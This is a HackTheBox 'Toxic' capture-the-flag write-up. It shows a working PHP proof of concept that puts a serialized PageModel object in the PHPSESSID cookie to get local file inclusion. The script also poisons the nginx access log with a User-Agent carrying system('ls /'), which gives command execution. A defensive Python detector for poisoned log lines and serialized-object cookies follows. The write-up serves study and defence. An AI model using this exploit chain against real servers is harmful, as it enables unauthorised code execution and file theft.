
HackTheBox Toxic Writeup

Explore the basics of cybersecurity in the Toxic Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

<?php
// Usage check: the script needs the target URL and the file path to request.
if ($argc < 3) {
    echo "Usage: php poc <url> <path>\n";
    exit(1);
}
// Object that gets serialized into the cookie; $file holds the requested path.
class PageModel
{
    public $file;
    public function __construct($file)
    {
        $this->file = $file;
    }
}
$url = $argv[1];
$file_path = $argv[2];
$page_model = new PageModel($file_path);
// Serialize the object and base64-encode it for use as the cookie value.
$payload = base64_encode(serialize($page_model));
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Send the crafted PHPSESSID cookie together with the PHP-bearing User-Agent.
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Cookie: PHPSESSID=$payload",
    "User-Agent: <?php system('ls /'); ?>"
]);
$response = curl_exec($ch);
curl_close($ch);
echo "Response:\n$response\n";

php poc <url> <path>

/var/log/nginx/access.log
/flag_Xapdy

Summary

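The exploit combines local file inclusion (LFI), reached through a crafted PHPSESSID cookie, with a malicious User-Agent header. The cookie carries a base64-encoded serialized PageModel object whose file property names the path to read. The User-Agent contains PHP code that runs ls / through system(), so the directory contents are exposed when the first path, the log file /var/log/nginx/access.log, is read through the LFI. That listing reveals the flag path, which is then requested the same way to retrieve the flag.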
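A defender's view of the same two artifacts, as an added example that is not part of the original writeup: it flags access-log entries whose User-Agent carries a PHP open tag, and PHPSESSID values that decode to a serialized PHP object instead of an opaque session id. It assumes nginx's default "combined" log format; the function names and the sample log lines and cookie are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[^"]*" \d{3} \S+ "[^"]*" "(.*)"$')
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)
SERIALIZED_OBJECT = re.compile(rb'^O:\d+:"([^"]+)":\d+:\{')
SERIALIZED_STRING = re.compile(rb's:\d+:"([^"]*)";')


def poisoned_log_lines(lines):
    """Return (line_number, client_ip, user_agent) for agents carrying a PHP open tag."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = COMBINED.match(line.rstrip("\n"))
        if match and PHP_TAG.search(match.group(2)):
            hits.append((number, match.group(1), match.group(2)))
    return hits


def inspect_session_cookie(value):
    """Return (class_name, path_like_strings) if the cookie decodes to a serialized
    PHP object, else None. A genuine PHP session id is a short opaque token."""
    try:
        raw = base64.b64decode(unquote(value), validate=True)
    except (binascii.Error, ValueError):
        return None
    match = SERIALIZED_OBJECT.match(raw)
    if not match:
        return None
    strings = [s.decode("utf-8", "replace") for s in SERIALIZED_STRING.findall(raw)]
    paths = [s for s in strings if s.startswith("/") or ".." in s]
    return match.group(1).decode("utf-8", "replace"), paths


# Constructed sample data (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system(\'ls /\'); ?>"',
]
SAMPLE_COOKIE = base64.b64encode(
    b'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}'
).decode()

if __name__ == "__main__":
    print(poisoned_log_lines(SAMPLE_LOG))
    print(inspect_session_cookie(SAMPLE_COOKIE))
```

The default combined format does not record cookies, so the cookie check has to run where the Cookie header is visible, such as a reverse proxy, WAF, or application middleware.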

This post is licensed under CC BY 4.0 by the author.